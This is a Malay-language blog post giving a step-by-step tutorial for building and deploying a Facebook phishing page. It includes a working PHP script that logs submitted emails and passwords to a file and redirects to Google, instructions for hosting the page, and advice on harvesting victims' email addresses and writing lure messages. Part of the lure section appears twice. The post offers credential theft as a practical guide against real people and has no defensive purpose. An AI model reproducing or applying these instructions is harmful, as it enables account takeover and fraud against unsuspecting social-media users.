1. Berikut perkara-perkara yang perlu anda tahu :
- Sedikit knowledge berkenaan dengan tag XHTML, HTML, dan code php.
- Hosting percuma atau berbayar.
- Target atau Mangsa – alamat emel facebook profile.
2. Terdapat 3 file + 1 Folder Facebook untuk membina laman phising facebook
index.htm
Anda boleh menciptanya dengan save as laman login facebook. Kemudian tukarkan fail .htm yang telah di save kepada index.htmdownload.php
Berikut adalah fail download.php. Copy code tersebut dan paste pada notepad. Kemudian save fail tersebut kepada download.php
<?php /* Created on: 09/05/2011 by nizamghazi.com */$fp = fopen("Passwords.htm", "a");fwrite($fp, "Email:$_POST[email]\tPassword:$_POST[pass]");echo "<HTML><head><title>Google</title><FRAMESET cols=\"*\"> <FRAME SRC=\"http://www.google.com\"></FRAMESET>";?>
Passwords.htm
Disinilah senarai e-mail dan password akan dipaparkan setelah mangsa login pada laman phishing yang anda cipta. Anda hanya perlu buka notepad dan save sebagai Passwords.htm. Dalam fail Passwords.htm anda tidak perlu masukkan apa-apa code.3. Ubah action pada index.htm form.
Buka kembali file index.htm yang anda save tadi. Cari tag form, guna
CTRL+ F to find the form tag. Tukarkan action yang asal kepada
download.php
4. Sekarang anda telah pun mempunyai 3 file di atas dan 1 folder facebook (Welcome to Facebook_files).
Untuk memudahkan anda, masukkan 3 file + 1 folder tadi dalam satu folder baru. Katakan anda namakan folder tersebut loginfacebook. Nama folder adalah optional ya. Yes! Sekarang anda telah pun mempunyai pakej laman phishing facebook yang lengkap. Seterusnya apa yang perlu anda buat?5. Test dahulu laman phishing pada localhost. Kemudian barulah upload di hosting
Anda boleh gunakan wamp atau xampp or any other localhost sofware. Bila dah test dan semuanya berjalan lancar,
bolehlah anda upload di hosting sendiri (jika ada). Kalau tak ada anda
boleh dapatkan di mana-mana website yang menyediakan servis web hosting
percuma
Untuk mem phishingkan mangsa, anda perlu alamat emel mereka. Kalau nak dapat emel mangsa senang sahaja, pergi pada facebook profile mereka, tengok dorang paparkan ke tak alamat emel. Kalau papar cantekkk…! Kalau tak papar, anda boleh dapatkan dengan cara cari di google dengan command mudah. Mungkin artikel yang akan datang saya akan tunjukkan. Sebenarnya melalui gambar pun(gambar yang korang upload di facebook tu), pun boleh dapatkan alamat emel. Melalui pengalaman saya pernah mengikuti kursus dan pertandingan hacking, penceramah mengatakan, ada beberapa cara maklumat anda boleh di curi, antaranya melaui e-mail, no. telefon, dan gambar. Lihat contoh yang saya buat di bawah :
Hyperlink yang panjang tu saya cipta sendiri supaya nampak real dan mangsa akan lebih percaya dan mudah tertipu. Contoh ayat yang anda boleh guna, “Hye Looser(kalau boleh nama mangsa), I have a private message for you.”. Seterusnya bila mangsa dah excited nak tahu apakah private message tersebut, mangsa akan terus klik pada hyperlink tersebut dan seterusnya mangsa berhadapan dengan laman phishing yang anda telah cipta. Lebih kurang macam pancing lah.
Phising Melalui laman sosial/chatroom/others site
Ini bergantung pada skill anda bagaimana mahu memerangkap mangsa. Ikut prinsip ini “Manusia selalu cuai”.
6. Target/Mangsa
Phishing Melalui E-mel (Hantar emel yang mengandungi link phishing)Untuk mem phishingkan mangsa, anda perlu alamat emel mereka. Kalau nak dapat emel mangsa senang sahaja, pergi pada facebook profile mereka, tengok dorang paparkan ke tak alamat emel. Kalau papar cantekkk…! Kalau tak papar, anda boleh dapatkan dengan cara cari di google dengan command mudah. Mungkin artikel yang akan datang saya akan tunjukkan. Sebenarnya melalui gambar pun(gambar yang korang upload di facebook tu), pun boleh dapatkan alamat emel. Melalui pengalaman saya pernah mengikuti kursus dan pertandingan hacking, penceramah mengatakan, ada beberapa cara maklumat anda boleh di curi, antaranya melaui e-mail, no. telefon, dan gambar. Lihat contoh yang saya buat di bawah :
Hyperlink yang panjang tu saya cipta sendiri supaya nampak real dan mangsa akan lebih percaya dan mudah tertipu. Contoh ayat yang anda boleh guna, “Hye Looser(kalau boleh nama mangsa), I have a private message for you.”. Seterusnya bila mangsa dah excited nak tahu apakah private message tersebut, mangsa akan terus klik pada hyperlink tersebut dan seterusnya mangsa berhadapan dengan laman phishing yang anda telah cipta. Lebih kurang macam pancing lah.
Phising Melalui laman sosial/chatroom/others site
Ini bergantung pada skill anda bagaimana mahu memerangkap mangsa. Ikut prinsip ini “Manusia selalu cuai”.
No comments:
Post a Comment